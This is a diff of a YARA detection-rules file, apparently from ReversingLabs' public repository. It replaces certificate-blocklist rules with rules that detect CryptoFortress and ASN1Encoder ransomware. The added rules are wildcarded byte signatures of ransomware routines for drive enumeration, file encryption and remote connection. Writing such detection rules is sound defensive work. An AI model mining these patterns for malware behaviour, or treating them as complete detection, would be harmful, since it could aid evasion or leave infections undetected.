-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DES SP Z O O" and ( pe.signatures [ i ] . serial == "00:c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" or pe.signatures [ i ] . serial == "c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" ) and 1594590024 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_volumes ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_02C5351936Abe405Ac760228A40387E8 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cryptofortress : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects CryptoFortress ransomware."
 		author = "ReversingLabs"
-		id = "6a1e5115-ac72-57a3-8418-7c81f38f76af"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "460289b1-f775-5e0b-8c44-4f6e5c92da60"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4384-L4400"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.CryptoFortress.yara#L1-L162"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5a990f8d1a3f467cdafa0f625bc162745d9201e15ce43fdc93cd6b1730572e89"
+		logic_hash = "474893b63523de5ff9eb8a0c91b0677b99ce65056af7f5d02a73e43fa65453c9"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "CryptoFortress"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$enum_drives = {
+            55 8B EC 83 C4 ?? 56 57 C7 45 ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 8D 7D ?? B2 ?? B9 ?? ?? ?? ?? A9 ?? ?? ?? ?? 74 ?? 88 17 47 D1 E8 FE C2 49
+            75 ?? C6 07 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F8 8D 75 ?? 8A 16 88 55 ?? 8D 45 ?? 50
+            FF 15 ?? ?? ?? ?? 8D 55 ?? C6 42 ?? ?? 83 F8 ?? 75 ?? 60 8D 45 ?? 50 8D 45 ?? 50 6A
+            ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
+            50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 05 ?? ?? ?? ?? 61 46 4F 75 ?? A1 ?? ?? ?? ?? A3
+            ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 5F 5E C9 C3
+        }
+		$enum_shared_resources = {
+            55 8B EC 83 C4 ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 0B C0 0F
+            85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 8D 45 ?? 50 FF 75 ?? FF 15
+            ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 3D ?? ?? ?? ?? 74 ?? 8B 4D ?? 51 8D 49 ?? 6B C9 ?? 8B
+            45 ?? 8D 0C 01 6A ?? 51 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? FF 75 ?? E8 ??
+            ?? ?? ?? 83 F8 ?? 76 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            0B C0 74 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 49 75 ?? EB
+            ?? EB ?? E9 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF
+            15 ?? ?? ?? ?? C9 C2
+        }
+		$find_files = {
+            55 8B EC 81 C4 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 40 0F 84 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? C6 00 ?? 2B 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            8D ?? ?? ?? ?? C7 04 08 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 8B 8D ?? ?? ?? ?? C7 44 08 ??
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F
+            85 ?? ?? ?? ?? 8B 4D ?? 0B C9 75 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 45 ??
+            8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 49 8B 1D ?? ?? ?? ?? 51 53
+            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 59 EB ?? 53 E8 ?? ?? ?? ?? 03 D8
+            83 C3 ?? 59 E2 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 0B
+            C9 75 ?? 3B D0 72 ?? EB ?? EB ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C9 C3
+        }
+		$encrypt_files = {
+            55 8B EC 83 C4 ?? 53 33 C0 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89
+            45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? FF 35 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 89 45 ?? FF 75 ?? E8 ?? ?? ?? ?? 33 C0 50 50 6A ?? 50 6A ?? 68 ?? ?? ?? ??
+            FF 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 8D 45
+            ?? 50 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
+            83 7D ?? ?? 75 ?? 83 7D ?? ?? 73 ?? E9 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? BB ?? ?? ?? ??
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? B8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B D2 75 ?? 0B C9 75 ?? B9 ?? ?? ?? ?? 89 4D ?? 89 55 ??
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 4D ?? 89 55 ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 89 4D ?? 89 55 ?? 0B DB 75 ?? 0B C0 74 ?? 83 45 ?? ?? 83 55 ?? ?? FF 75 ??
+            FF 75 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ??
+            ?? ?? 76 ?? B8 ?? ?? ?? ?? EB ?? 8B 45 ?? 6B C0 ?? 89 45 ?? 6A ?? 8D 45 ?? 50 FF 75
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? E9 ?? ?? ?? ??
+            6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? E8 ?? ??
+            ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF
+            75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? DF 6D ?? DA 45
+            ?? DF 7D ?? C7 45 ?? ?? ?? ?? ?? DF 6D ?? DA 65 ?? DF 7D ?? C7 45 ?? ?? ?? ?? ?? DF
+            6D ?? DA 65 ?? DF 7D ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 74 ?? E9 ?? ?? ?? ?? 8F 45 ??
+            8F 45 ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ??
+            ?? ?? 0B C0 74 ?? EB ?? 6A ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ??
+            ?? 0B C0 75 ?? EB ?? 6A ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
+            ?? 0B C0 75 ?? EB ?? EB ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 FF 75 ?? FF 15 ?? ??
+            ?? ?? FF 75 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ??
+            50 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B C9 C2
+        }
+		$read_config_file = {
+            55 8B EC 83 C4 ?? [0-20] 6A ?? 68 ?? ?? ?? ?? 6A
+            ?? (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 ?? 33 C0 C9
+            C3 89 45 ?? 50 6A ?? (E8 | FF 15) ?? ?? ?? ?? 0B
+            C0 75 04 33 C0 C9 C3 89 45 ?? FF 75 ?? 6A ??
+            (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3
+            89 45 ?? 50 (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 04
+            33 C0 C9 C3 89 45 ?? FF 75 ?? 6A ?? (E8 | FF 15)
+            ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? 8B
+            D8 FF 75 ?? FF 75 ?? FF 75 ?? (E8 | FF 15) ?? ??
+            ?? ?? FF 75 ?? (E8 | FF 15) ?? ?? ?? ?? 8B 5D ??
+            6A ?? 53 68 ?? ?? ?? ?? (E8 | FF 15) ?? ?? ?? ??
+            83 C3 ?? 8B 45 ?? 83 (E8 | FF 15) ?? 50 53
+            (E8 | FF 15) ?? ?? ?? ?? 8A 03 A2 ?? ?? ?? ?? 83
+            C3 ?? 8A 03 A2 ?? ?? ?? ?? 83 C3
+        }
+		$file_type_loop = {
+            51 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8
+            ?? 75 03 59 EB ?? 53 E8 ?? ?? ?? ?? 03 D8 83 C3
+            ?? 59 E2 DC [20-40] FF B5 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 0B C0 75 44 FF B5 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 85
+        }
+		$encrypt_routine = {
+            FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
+            [0-10] E9 ?? ?? ?? ?? 6A ?? [1-10] FF 75 ??
+            FF (35 | 75) [1-4] FF 75 ?? (E8 | FF 15)
+            ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? [1-10] FF (35 | 75) [1-4] 6A ??
+            6A ?? 6A ?? FF 35 ?? ?? ?? ?? (E8 | FF 15) ??
+            ?? ?? ?? 0B C0 75 ?? (EB | E9) [1-4] 6A ??
+            [2-10] FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8
+            ?? 75 ?? [10-40] FF (35 | 75) [1-4] FF 75 ??
+            (E8 |FF 15)
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RESURS-RM OOO" and pe.signatures [ i ] . serial == "02:c5:35:19:36:ab:e4:05:ac:76:02:28:a4:03:87:e8" and 1589932801 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $read_config_file and $file_type_loop and $encrypt_routine ) or ( $enum_drives and $enum_shared_resources and $find_files and $encrypt_files ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1Ecd829Adcc55D9D6Afe30Dc371Ebda6 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Asn1Encoder : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects ASN1Encoder ransomware."
 		author = "ReversingLabs"
-		id = "db9f022b-f650-5d40-ae84-4df92b0f3a96"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "5fa361e5-4ab0-5856-92b2-6f434e33c350"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4402-L4420"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.ASN1Encoder.yara#L1-L136"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "02955f4df7deccab52cdd82fd04d5012db7440f85c87d750fa9f81ff85e2dab0"
+		logic_hash = "000fd846fa5f09af19ead4623bb5a8eb51cdb4c751013569bf070710d3e0d61d"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "ASN1Encoder"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection_p1 = {
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 0F B6
+            84 34 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 53 E8 ?? ?? ?? ??
+            83 C4 ?? 83 C3 ?? 46 83 FE ?? 72 ?? 8B 5C 24 ?? BE ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 50
+            68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 56 50
+            E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 8B F0 85 FF 74 ?? A1 ?? ?? ?? ?? 0F B6 04 06 50 B8 ??
+            ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 C3 ?? 46 3B F7
+            72 ?? 8B 5C 24 ?? A1 ?? ?? ?? ?? BE ?? ?? ?? ?? 53 50 68 ?? ?? ?? ?? 56 50 E8 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B FB 8B F0 0F B6
+            84 34 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 57 E8 ?? ?? ?? ??
+            83 C4 ?? 83 C7 ?? 46 83 FE ?? 72 ?? A1 ?? ?? ?? ?? 53 50 68 ?? ?? ?? ?? BB ?? ?? ??
+            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68 ??
+            ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68
+            ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 33 F6 8D 51 ?? 66 8B 01
+            83 C1 ?? 66 3B C6 75 ?? 2B CA 8B 15 ?? ?? ?? ?? D1 F9 8D 72 ?? 8A 02 42 84 C0 75 ??
+            8B 3D ?? ?? ?? ?? 2B D6 8D 04 0A 8D 34 45 ?? ?? ?? ?? 56 6A ?? FF D7 50 FF 15 ?? ??
+            ?? ?? 8B D8 8D 04 36 50 6A ?? 89 5C 24 ?? FF D7 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ??
+            ?? 8B F8 FF 35 ?? ?? ?? ?? 89 7C 24 ?? 68 ?? ?? ?? ?? 56 53 E8 ?? ?? ?? ?? 33 C9 89
+        }
+		$remote_connection_p2 = {
+            44 24 ?? 83 C4 ?? 89 8C 24 ?? ?? ?? ?? 8B D9 85 C0 7E ?? 8B 44 24 ?? 0F B7 04 58 66
+            89 84 24 ?? ?? ?? ?? 83 F8 ?? 75 ?? 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C1 75 ?? BE
+            ?? ?? ?? ?? 83 C3 ?? A5 A5 66 A5 EB ?? 8D 94 24 ?? ?? ?? ?? 8B F2 66 8B 02 83 C2 ??
+            66 3B C1 75 ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C1 75 ?? 8B CA C1 E9 ?? F3
+            A5 8B CA 83 E1 ?? F3 A4 33 C9 8B 7C 24 ?? 43 3B 5C 24 ?? 7C ?? FF 74 24 ?? 51 FF 15
+            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 FF D6 FF 35 ?? ?? ?? ?? 33 C0 50 FF 15 ?? ?? ?? ??
+            50 FF D6 8B 5C 24 ?? 53 33 DB 53 FF 15 ?? ?? ?? ?? 50 FF D6 FF 74 24 ?? 53 FF 15 ??
+            ?? ?? ?? 50 FF D6 FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 50 FF D6 8B 5C 24 ?? 89 3D ?? ??
+            ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 33 FF E9 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 57
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 85 C0
+            0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 8B F3 89 5C 24 ?? 8D 4E ?? 8A 06 46 84
+            C0 75 ?? 8B 3D ?? ?? ?? ?? 2B F1 68 ?? ?? ?? ?? 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 89
+            44 24 ?? 85 DB 0F 84 ?? ?? ?? ?? 81 FE ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ??
+            ?? ?? BA ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 59 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B C8 8B F8 3B FE 73 ?? 81 F9 ?? ?? ?? ?? 74 ?? FF 74
+            24 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 04 1F 50 E8
+        }
+		$encrypt_files_p1 = {
+            8B CA 8D 84 24 ?? ?? ?? ?? C1 E9 ?? F3 A5 53 68 ?? ?? ?? ?? 6A ?? 53 6A ?? 8B CA 83
+            E1 ?? 68 ?? ?? ?? ?? F3 A4 50 FF 15 ?? ?? ?? ?? 8B D8 33 FF 89 5C 24 ?? 89 3D ?? ??
+            ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 FB ?? 74 ?? 85 DB 0F 85 ?? ?? ?? ?? 33
+            F6 8D 8C 24 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? BE ?? ?? ?? ?? 50
+            8D 44 24 ?? 8B D6 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B CE E8 ?? ?? ?? ?? 33 D2
+            8D 88 ?? ?? ?? ?? 8D 81 ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8B 44 24 ?? C1 E8 ?? 89
+            44 24 ?? 83 C0 ?? 89 44 24 ?? 8B F0 8B C1 F7 F6 40 0F AF 44 24 ?? 50 6A ?? 89 44 24
+            ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 6A ?? FF 15 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ??
+            8D 44 24 ?? 83 C4 ?? 81 C2 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 39 5C 24 ?? 76 ?? 8B 44 24 ?? 8D
+            54 24 ?? 8B 4C 24 ?? 2B C3 3B 44 24 ?? 0F 42 F0 8D 84 24 ?? ?? ?? ?? 50 8B 44 24 ??
+            8D 0C 39 68 ?? ?? ?? ?? 03 C3 56 50 E8 ?? ?? ?? ?? 03 7C 24 ?? 83 C4 ?? 03 DE 3B 7C
+            24 ?? 72 ?? 33 FF 8D 84 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5C 24 ?? 83 FB ?? 74 ?? 85 DB 74 ?? 57 8D 44 24 ??
+            89 7C 24 ?? 8B 3D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D7 33 F6 8D 44
+        }
+		$encrypt_files_p2 = {
+            24 ?? 56 50 FF 74 24 ?? FF 74 24 ?? 53 FF D7 33 FF 68 ?? ?? ?? ?? 57 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? FF 74 24 ?? 57 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 FF D6
+            FF 74 24 ?? 57 FF 15 ?? ?? ?? ?? 50 FF D6 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ??
+            ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 33 F6 56 53 FF 15 ?? ?? ?? ?? 3D ??
+            ?? ?? ?? 76 ?? 39 35 ?? ?? ?? ?? 75 ?? 56 53 FF 15 ?? ?? ?? ?? 56 8B F8 B8 ?? ?? ??
+            ?? 56 50 53 2B F8 FF 15 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            56 8D 8C 24 ?? ?? ?? ?? A3 ?? ?? ?? ?? 51 57 50 53 FF 15 ?? ?? ?? ?? 33 C0 50 50 50
+            53 FF 15 ?? ?? ?? ?? 33 F6 8D 84 24 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            53 FF 15 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF
